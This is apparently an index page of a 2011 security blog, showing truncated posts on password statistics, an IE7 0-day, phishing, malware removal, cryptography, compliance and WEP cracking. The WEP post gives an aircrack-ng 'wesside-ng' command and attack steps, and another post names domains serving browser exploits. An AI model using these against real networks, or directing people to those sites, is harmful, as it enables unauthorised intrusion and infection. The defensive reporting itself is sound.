    No, we do not store passwords in clear text; the statistics were obtained during an experiment at one of the social networks through anonymous data collection and, alas, I can neither publish the resulting dictionary nor name this network.

    What

    All passwords were checked for the presence of digits, special characters and mixed case, and for strength using cracklib.

    Data

    Length distribution
    < ... Read more »
    Views: 1894 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    An addition to the post: A new attack on an unpatched flaw in the IE browser

    0-day exploits are exploits for vulnerabilities that have been discovered by hackers and for which patches have not yet been released, or about which nothing is known to the security teams of the companies in whose products the holes were found.

    It turns out that the IE7 security hole that caused a "sensation" in recent days was not fixed by yesterday's (12/09/2008) patch MS08-073. This means that the vulnerability is currently present in fully patched Windows XP.

    Heap (English: heap): in computer science and programming, a region of reserved address space; the conventional name of the data structure on top of which an application's dynamic memory is implemented. Wikipedia
    The exploit is based on a heap overflow affecting the browser's XML parser. After the heap is set up, the code checks whether the exploit will work. For "successful" operation the exploit requires the IE7 browser and Windows XP or Windows ... Read more »
    Views: 578 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Currently, many online services (those dealing with finance) use a scanned copy of your passport as confirmation of your identity. Such services include billing systems, domain registrars and payment systems.
    Today an interesting letter arrived at our corporate address (job@nashdomen.com), which is used to receive résumés from candidates for our vacancies. I quote the letter:

    Hello!
    We have reviewed your résumé on the site www.rabota.ru, and you suit us completely. A personnel manager will contact you and you will need to come in for an interview. To confirm the data you posted on the site www.rabota.ru, and for security reasons, we ask you to send a photocopy of the first page of your passport and a photocopy of your registration to our e-mail nefte_stroy@mail.ru. Full information about our company can be found on the site www.rabota.ru.
    Company LLC "Neftestroy"


    Part of the header:
    Return-Path: <nefte_stroy@mail.ru>
    Delivered-To:
    Rec ... Read more »
    Views: 579 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    I would like to share my experience of implementing content filtering with the eSafe hardware and software appliance.

    eSafe is a proactive protection tool installed at the Internet gateway that prevents known and unknown malware and spam from entering the protected network and restricts access to data and applications that do not comply with corporate policy or moral and ethical standards.

    eSafe was developed by Aladdin, now SafeNet. eSafe has 4 operating modes: eSafe Mail, eSafe Web, eSafe Web & Mail and eSafe Web SSL. eSafe can work as a bridge, in which case it is invisible to users except when something is blocked and the user sees the block page. The block page can be modified by editing its code in the console, or disabled.

    Advantages of the appliance:
    • filtering on the fly
    • blocking applications (Skype, ICQ, XMPP, etc.) and anonymizers
    • virus removal and blocking of Trojan communications
    • possibility of clustering
    • main network card has B ... Read more »
    Views: 695 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Around the beginning of November, security experts noticed unusual botnet behavior: botnets began coordinating their efforts in a slow enumeration of logins and passwords against various hosts. Experts call it "slow bruteforce" because the speed of the brute force is extremely low (all combinations of all possible passwords for the logins in the dictionary have to be enumerated), and the process will take several years. But thanks to the huge number of machines involved in the attack it still gradually moves forward, and every day the hackers get a "catch." Requests go to different IPs (see logs). The attack is apparently coordinated from a common center (the bots share a common dictionary for the enumeration).

    So far the botnets have gone through more than half of the dictionary and reached the letter "o". How it will end and who is behind the strange activity is not yet entirely clear. It is also unclear why the attackers do not touch machines running OpenBSD.

    One thing is clear: the recent botnet activity ha ... Read more »
    Views: 559 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Among the web pages added to the database of SiteGuard, a free antivirus for websites, pages containing potentially dangerous iframe or JavaScript code have recently begun to appear fairly often, and these snippets have one thing in common: they all pointed to different pages on the domain _google-analistyc.net_ (careful: at the moment there is just the word test there, but anything may appear, which is why such sites should be visited with JS disabled). Details are under the cut.

    For example, the discovered page in turn loads an iframe with the address _http://www.telexexchange.net/psy/_ (careful!).
    The script at this address identifies the browser type and serves the corresponding exploits, including ones for Firefox and Opera. For those wishing to experiment on their own, I emphasize once again that this site should only be visited with JavaScript disabled in the browser, and IE users had better refrain from experimenting. At the time of this writing, the site has not yet appeared in a database o ... Read more »
    Views: 709 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    At present, the protection of personal data is one of the most pressing problems for the majority of commercial and governmental organizations. Information systems must be brought into compliance with the requirements of the Federal Law "On Personal Data" no later than July 1, 2011.

    I plan to write a series of articles on common methods of protecting personal data that can help your company reduce what it spends on some services of companies involved in data protection, or at least understand what you are paying for. Everything described here we went through in our own company.

    As a result of all the actions that will be described, we successfully received a certificate of compliance of our ISPDn with the requirements of the Federal Law and saved about 45000r. on the services of integrators (12 AWP + server).

    ISPDn survey

    Building a protection system for a personal data information system (ISPDn) begins with a survey of the ISPDn, its classification and compila ... Read more »
    Views: 834 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Isn't it a burden to clean a bunch of malicious items off your favorite flash drive after every connection to someone else's computer? And how many nerve cells do these items destroy? For me, countless!

    All the ways I know of combating such incidents (such as: switch to Linux, disable autorun, don't plug the stick in just anywhere, etc.) are not acceptable to me. So I had to invent my own.

    To some this method will surely seem ineffective, to others inconvenient. And someone will sigh with relief or even help less experienced friends.

    I should note that on a flash drive secured this way, operations on items in the root folder will be hampered. The method is based on exactly this.

    The gist: forbid everyone from writing to / changing the root directory.
    Result: none of the evil that lands on the stick can do anything.


    The first thing to do is create an NTFS partition on the flash drive. How? Google will tell you in full detail. I will point out the ... Read more »
    Views: 559 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Whoever owns the information owns the market! Paul Gates

    Starting with this article, I will try to examine a number of issues relating to the security of a firm.

    Question 1: Trade secrets. What are they and what do they do?

    According to Article 139 of the Civil Code, a trade secret is information that has actual or potential commercial value by virtue of being unknown to third parties, to which there is no free lawful access, and whose owner takes measures to protect its confidentiality.

    I think many Habr readers have their own large, medium or small firms. It therefore seemed useful to talk about how important it is to protect information in a firm, from what, and how. By information I mean not only what is stored in a computer; the concept also includes such things as:
    information about customers, contractors, suppliers, customers, consumers, customers, partners, funders, intermediaries and other partners business relationsh ... Read more »
    Views: 574 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Everyone has heard of asymmetric cryptography, but surely not everyone knows what it is and how it is used.

    Let's try to understand it using the RSA algorithm as an example.

    The RSA algorithm, which stands at the origins of cryptography, was proposed by three research mathematicians, Ronald Rivest (R. Rivest), Adi Shamir (A. Shamir) and Leonard Adleman (L. Adleman), in 1977-78.

    Any asymmetric encryption requires a key pair: a public key and a private key. Why are they needed?

    Above is a diagram of how the parties interact in an asymmetric encryption system. The generator produces a key pair, public ([Ea, N]) and private ([Da, N]). The public key is transmitted to the sender, who encrypts a message with it and sends the encrypted message (Ea(DATA)) to the receiver, who decrypts it with the private key ([Da, N]) and obtains the original message.

    The RSA algorithm is based on the use of one-way encryption functions, which have the property:
    Views: 765 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    The new iWork '09 software package for Mac, presented at MacWorld 2009, appeared on torrents literally the same day. Naturally, it was a pirated version, but the fun lies elsewhere. The popular software package for MacOS came with a "bonus" in the form of the Trojan OSX.Trojan.iServices.A. According to experts from the company Intego, approximately 20,000 computers were infected.

    The Trojan registers itself for autostart and obtains full rights, so it can install additional malicious code and modify installed applications.

    The good news is that the Trojan does not spread by itself; it can be installed only with a pirated copy of iWork '09. So beware!

    UPD: found a news item in which someone claims to have caught it with a trial version downloaded from a torrent tracker instead of the official site. Some details on the symptoms are also given.

    UPD 2: How to find and fight it (thanks ilmarinen)
    1. Before you install iWork '09 ch ... Read more »
    Views: 560 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Right now a viral file, "YOUR-MOTHER-NAKED-hahahaha.pif", is being sent around Skype at incredible speed. If you carelessly open it, it is automatically sent to all users in your contact list.
    Here are the steps that will help remove the infection:
    1) Restart your computer and boot into Safe Mode (F8 during startup)
    2) Log in under the account in which the virus was picked up
    3) Open Task Manager (Ctrl + Alt + Del) and check whether the winservice process is running (if yes, kill it).
    4) Delete the ill-fated file that you received over Skype - YOUR-MOTHER-NAKED-hahahaha.pif
    5) Clean the Temp directory (Windows Vista: C:\Users\%username%\AppData\Local\Temp and Windows XP: C:\Documents and Settings\%username%\Local Settings\Temp)
    6) Empty the Recycle Bin (if the files were not deleted with Shift + Delete)
    7) Sign into ... Read more »
    Views: 565 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    I am a person (strange as it may sound), just like all of you.
    Like you, I leave my information on the Internet, and I do not want anyone to know more about me than I would write about myself on, say, Facebook.

    The first time I came across Radarix, I looked, laughed and left. The second time I got there, I was very puzzled. I looked up myself and my relatives, and yes, all the information matched.

    It immediately became clear that I had to fight this somehow. I wrote to their support, saying, in effect, what the heck. As expected, no response followed. Many thoughts flashed through my head, but they all seemed delusional. Then I came across posts on Habr about letters to the president. What I did next is understandable: I wrote such a letter. (Unfortunately, I do not remember exactly what I wrote, but it was something in the spirit of "why doesn't the government shut down such resources?")

    About two weeks later, on December 17, I received a letter that said my appeal was directed to consider ... Read more »
    Views: 704 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    This is a continuation of the previous article, "Attacks on wireless access points with WEP protection".

    In the second part of this series of articles on wireless security, we look at some unconventional attacks on WEP.


    In the latest (unstable) version of aircrack-ng, a few programs were added that implement new attacks on the WEP protocol.

    The first of them is wesside-ng. In essence, it is a script that automates cracking the key. The program has several options, but to run it you only need to give it the name of the network interface to use:

    wesside-ng -i wlan0

    The algorithm works the same way as manual cracking:

    1. Hopping through the channels, it finds a network with WEP.

    2. Fake authentication is performed. If MAC filtering is enabled, the adapter's address is changed to a valid one.

    3. Authentication is made.

    4. The fragmentation attack yields 128 bits of keystream.

    5. Catch ARP-packet, IP address in the body stands. Based on th ... Read more »
    Views: 580 | Added by: w1zard | Date: 15.03.2011 | Comments (0)



    True, the word "passport" appears only in the official explanations of the project; its working title is «Identity Ecosystem», and the official one is «National Strategy for Trusted Identities in Cyberspace». Naturally, the public immediately thought of the notorious "Big Brother" from "1984". In that "ideal society", the state interacts very well with the public, knowing everything about everyone through an identification system. What is the official goal of developing web passports? Officials say the project aims to improve the safety of citizens on the web.

    For example, U.S. Secretary of Commerce Gary Locke speaks of "strengthening the security of the web, improving confidentiality and improving the system of authorization on different resources, so users will not need to memorize dozens or hundreds of passwords". Locke argues that thanks to the Internet passports, perhaps, the old authentication system via "password / username" pairs will be completely disca ... Read more »
    Views: 575 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Two of my friends asked me, within the same week, essentially the same question (something in the spirit of: "I heard that MD5/SHA-1 have been hacked, so why do we still use them?"), which prompted me to write this article, although the main events described below took place more than 3 years ago.

    General information (experts may safely skip this)


    As you know, cryptographic hash sums differ from ordinary hash sums in that, in addition to the basic properties required of any hash function:
    • the ability to convert an input value (usually text) of any length into an output value of fixed length,
    • statistical uniformity of the distribution of output values,
    • good "dispersion" (a difference in approximately half of the bits) of output values even for input texts that differ only slightly (perhaps by a single bit);
    cryptographic hash algorithms are subject to additional requirements:
    Views: 596 | Added by: w1zard | Date: 15.03.2011 | Comments (0)